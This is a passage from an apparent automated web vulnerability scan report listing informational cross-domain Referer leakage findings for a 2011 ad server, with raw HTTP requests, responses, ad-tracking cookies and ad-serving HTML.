Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; liday1=fh'jT*YKlx8SkUq!79C8<4H$c; ih="b!!!!,!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!'=3f8_!2(Qv!!!!#=3^]V!2reF!!!!$=3f8u!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!4A]Y!!!!#=3f8q!4ZV5!!!!#=3f8^"; vuday1=BKZI(BgvR-4M6Eq!79C851U_*; pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'%o=!#:m/!#Ds0$To(/!i=9S!!28s!(=Q)~~~~~~=3f8u=3p6!M.jTN!#101!!E)(!$XwW!1n,b!#t3o~!#Ds0$To(1!w1K*!%4=*!#!8+!$]7n~~~~~=3f8_~~!$?74!!E)(!$Xwe!4ZV5!'@G9!!!!$!?5%!$To(.!wVd.!%4=*!$#x5!(^vn~~~~~=3f8^=4'1X!!!#G"; lifb=0EA2)A9.-BM7F2P; bh="b!!!#M!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!#=3f9$!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!
!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!#=3f8^!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:46 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0190.rm.sp2
Set-Cookie: ih="b!!!!#!4ZV4!!!!#=3f9>"; path=/; expires=Thu, 05-Sep-2013 12:45:46 GMT
Set-Cookie: bh="b!!!!#!$?1O!!!!#=3f9>"; path=/; expires=Thu, 05-Sep-2013 12:45:46 GMT
Set-Cookie: vuday1=@n$r!!79C8U9BKI; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!#!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9>=4'28!!!#G"; path=/; expires=Thu, 05-Sep-2013 12:45:46 GMT
Set-Cookie: uid=uid=23edad00-d886-11e0-8f26-78e7d1f5d92a&_hmacv=1&_salt=3223395414&_keyid=k1&_hmac=46d1029a6a257f1cf41cff0543eaa45aa4369721; path=/; expires=Thu, 06-Oct-2011 12:45:46 GMT
Set-Cookie: lifb=M5Jkn5cn<bEff6B; path=/; expires=Tue, 06-Sep-2011 16:45:46 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:45:46 GMT
Pragma: no-cache
Content-Length: 1425
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10834542);}
</script><script type="text/javascript" src="http://tags.mathtag.com/view/js/?strat=109185&cr=126412&supply=99&random=1315313146&rfr=http%3A%2F%2Fmaps%2Eyahoo%2Ecom%2Fdarla%5Ffc%3Fcb%3Dyahoo%2Eads%2Edarla%2E%5Floaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf%2D8%26rn%3D1315331124066%26em%3D%257b%2522site%2Dattribute%2522%253a%2522content%253dno%5Fexpandable%253bajax%5Fcert%5Fexpandable%2522%252c%2522ad&rfid=238934&ymct=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F3%2CeAGVUMty4jAQ%2EJmFwxZYL78IpdoSYAjY5mmHJRdKtgTEGNsxImT%2Efg3epLiuDjOtnurWtBDpxgJGkYhQx%2DYc7UyziwgmMjaEvZMt2O12kQEtQjpIh62X93DA5m44Yr1L%2DB6y%2D3HXwq0RY%2EsbGNe3uX3rg%2E4UOs93nrHLR7iqh302T%2E7pa%2DI%2Eax9Nvt659Wst11QynCfj3rfZwCE%2Dniavax9664U%2DG2yUHwxTv48O08SBXhDrr4E4%2DsHLaTqaHv1vIaOtg1LFEwD7NI94qvFSaH%2E4Ic%2D1OD%2DB1XhEkVHodqESBXxq2ZZNiIZ0XTcQvAHcQbbZ0ZBpdExCwICeeHEGK4ohxoRgHepP3tLpgw3dsOfZDDi%2E5xQRZBAMqynw6N6I0it2x24eFGxZJEGqXZPF1fMPwuJH4zSUC8bC0gM9%2DnY4fCzCfLTJ8jaY1DaVF9YR0aGBgUv94ww5BLprf9GZhfYEGmO72ANGTWwijC2wpBD8%2EPGV%2DbbrQ1rBy5Rvd%2EGvOKL1H3Bx1u6stk1zLqRoFveAzd1DwGZK01LGTZnRi9q17WaZ1bsRVO0GTbMpT7RhRQ2Mz29KtrlS5Vt0UbIiGoRXNc4zJTPVICLLt%2EKz4JngUSobJOIJ%2E9zGslSPdCXDcSXj4i%2EI9dQd%2C"></script>
...[SNIP]...

15.35. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string, so any request the browser makes for the cross-domain resources below will, by default, carry that URL (query string included) in the Referer header. The response contains the following link to another domain:

Request

GET /iframe3?XKUDAKjdGABqIpUAAAAAAArpJQAAAAAAAAAMAIAAAAAAAA0AAQADCJ6uAQAAAAAAKasxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAgAAAAAAAIBYzSd4lD8AAMR19m7APwAAAAAAAAAAAADEdfZuwD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkUwEvWfquCkNTvJHg9xPRNBp4BwKItE8yE2ryAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p1ufq9q%2FM%3D787833.14485997.14323832.8514476%2FD%3Dsports%2FS%3D25664825%3AMIP2%2F_ylt%3DAmg2OFI6cJlUlIgmD62T3F05nYcB%2FY%3DYAHOO%2FEXP%3D1315320305%2FL%3Dcopx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z%2FB%3DXvrxAdBDRyg-%2FJ%3D1315313105713897%2FK%3Dr8awXcUkJHjbbi3QZybcoQ%2FA%3D6284797%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14485997%26Z%3D300x100%26_PVID%3Dcopx%255fWKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL%255fz%26_salt%3D3618678928%26cb%3D1315313105713897%26i%3D140509%26r%3D0,10a65710-d886-11e0-be99-78e7d15f7c8c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=copx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z&ad_type=iframe&ad_size=300x100&site=140509&section_code=14485997&cb=1315313105713897&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15p1ufq9q/M=787833.14485997.14323832.8514476/D=sports/S=25664825:MIP2/_ylt=Amg2OFI6cJlUlIgmD62T3F05nYcB/Y=YAHOO/EXP=1315320305/L=copx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z/B=XvrxAdBDRyg-/J=1315313105713897/K=r8awXcUkJHjbbi3QZybcoQ/A=6284797/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!!E)(!$XwW!1n,b!#t3o~!#Ds0$To(1!w1K*!%4=*!#!8+!$]7n~~~~~=3f8_~~!$?74!!E)(!$Xwe!4ZV5!'@G9!!!!$!?5%!$To(.!wVd.!%4=*!$#x5!(^vn~~~~~=3f8^=4'1X!!!#G"; ih="b!!!!,!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!'=3f8_!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!4A]Y!!!!#=3f8q!4ZV5!!!!#=3f8^"; vuday1=BKZI(BgvR+4M6Eq!79C8LO3Y0; liday1=fh'jT*YKlx8SkUq!79C8<4H$c; bh="b!!!#L!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P
!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!#=3f8^!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:24 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0133.rm.sp2
Set-Cookie: ih="b!!!!,!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!'=3f8_!2(Qv!!!!#=3^]V!2reF!!!!%=3f9'!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!4A]Y!!!!#=3f8q!4ZV5!!!!#=3f8^"; path=/; expires=Thu, 05-Sep-2013 12:45:24 GMT
Set-Cookie: vuday1=BgvR)!79C8gzv0u; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'%o=!#:m/!#Ds0$To(/!i=9S!!28s!(=Q)~~~~~~=3f9'=3p6,M.jTN!#101!!E)(!$XwW!1n,b!#t3o~!#Ds0$To(1!w1K*!%4=*!#!8+!$]7n~~~~~=3f8_~~!$?74!!E)(!$Xwe!4ZV5!'@G9!!!!$!?5%!$To(.!wVd.!%4=*!$#x5!(^vn~~~~~=3f8^=4'1X!!!#G"; path=/; expires=Thu, 05-Sep-2013 12:45:24 GMT
Set-Cookie: uid=uid=171d2eac-d886-11e0-9af3-78e7d16242b6&_hmacv=1&_salt=319101247&_keyid=k1&_hmac=a9d5113b5118d5859bece0305bda41a4443fdd38; path=/; expires=Thu, 06-Oct-2011 12:45:24 GMT
Set-Cookie: lifb=0EA2)D0!)KJ4EWf; path=/; expires=Fri, 09-Sep-2011 12:45:24 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:45:24 GMT
Pragma: no-cache
Content-Length: 1002
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9773674);}
</script><iframe src="http://view.atdmt.com/TR1/iview/332867993/direct/01?time=1315313124&click=http://ads.bluelithium.com/clk?3,eAGlUctyolAQ.ZlZTTncN1xD3cVFIAEkisEJuLF4OBiEAZEEzdcPNUZr9tObPtWPc6pPI6IjhjHjdJfsMpWzlOqIYLLLGGeQTKCu61jjVMMUQTiJvLUpvTJ.lMbRadfyGl3rBl9QSl86NwylDKQ5c9X3Mf8NLzmdb93.y2bu3oVGweKLjUb2snSMO7dpDXEYo-dPa5i.BnRhxr0f2pU.Q2-b8MDmYUY3YX7ww5.1M.ZpPNw3xWTf9-0DAEXVpEmlJF2uXJJ90yhZU4MX51Eg1qL3X8fpEfhC4xonREGUcjadaiMYTeQEK5yNNU0Fpji1TdefwIvATFUpx-zBd5YYbC9VL2Rd4IXtqJlbrSunqE0Vh8SG7HecGSAWsXxaLIAVLQUiiBEMCWRgLrKmPW9fPWdpaa1ctWVYKUMZuNzf51pyYLWdW3I2334CQ0Qf3Vnmhrm6FD-Ae6UZuSDTEOFTDXii48kQZeuD-1Sm6RsJNpc0awIghYrH948jKwHB9283V67X.OPIH92VpyU=," frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="100"></iframe>
...[SNIP]...

15.36. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string, so any request the browser makes for the cross-domain resources below will, by default, carry that URL (query string included) in the Referer header. The response contains the following link to another domain:

Request

GET /iframe3?XKUDANuUGABxQIsAAAAAAB4aEgAAAAAAAAAAAAIAAAAAAA0AAwADCOQEHgAAAAAA7mUJAAAAAAA.8RgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0AAAAAAAAAUQMh2vp8aLwdAAAAAAAAAFEDIdr6fGi8HQAAAAAAAABRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADybj2mQvquCoy2g5qtNswR0SnC3DrdYwQyp9lvAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15rhf5648%2FM%3D787833.14445125.14291892.1806201%2FD%3Dsports%2FS%3D2022092242%3ALREC%2F_ylt%3DAuXImj6wykRaku7iPAhaBYTSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320284%2FL%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%2FB%3DEhSePtj8fcY-%2FJ%3D1315313084968840%2FK%3DtHb_lv57MAgihszSpmJhkw%2FA%3D6261244%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445125%26Z%3D300x250%26_PVID%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%26_salt%3D3458229403%26cb%3D1315313084968840%26i%3D140509%26r%3D0,0282c42a-d886-11e0-a87a-78e7d1fa057c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=F8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ&ad_type=iframe&ad_size=300x250&site=140509&section_code=14445125&cb=1315313084968840&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15rhf5648/M=787833.14445125.14291892.1806201/D=sports/S=2022092242:LREC/_ylt=AuXImj6wykRaku7iPAhaBYTSrYZ4/Y=YAHOO/EXP=1315320284/L=F8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ/B=EhSePtj8fcY-/J=1315313084968840/K=tHb_lv57MAgihszSpmJhkw/A=6261244/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; liday1=*YKlx8SkUp!79C8$pV9-; ih="b!!!!*!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'!4ZV5!!!!#=3f8^"; bh="b!!!#F!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3:c!!!!#=3f8T!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:P
y!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!#=3f8^!$?i5!!!!%=3`c_"; vuday1=BgvR)4M6Eq!79C8gRpX4; pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~!$?74!!E)(!$Xwe!4ZV5!'@G9!!!!$!?5%!$To(.!wVd.!%4=*!$#x5!(^vn~~~~~=3f8^=4'1X!!!#G"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:53 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
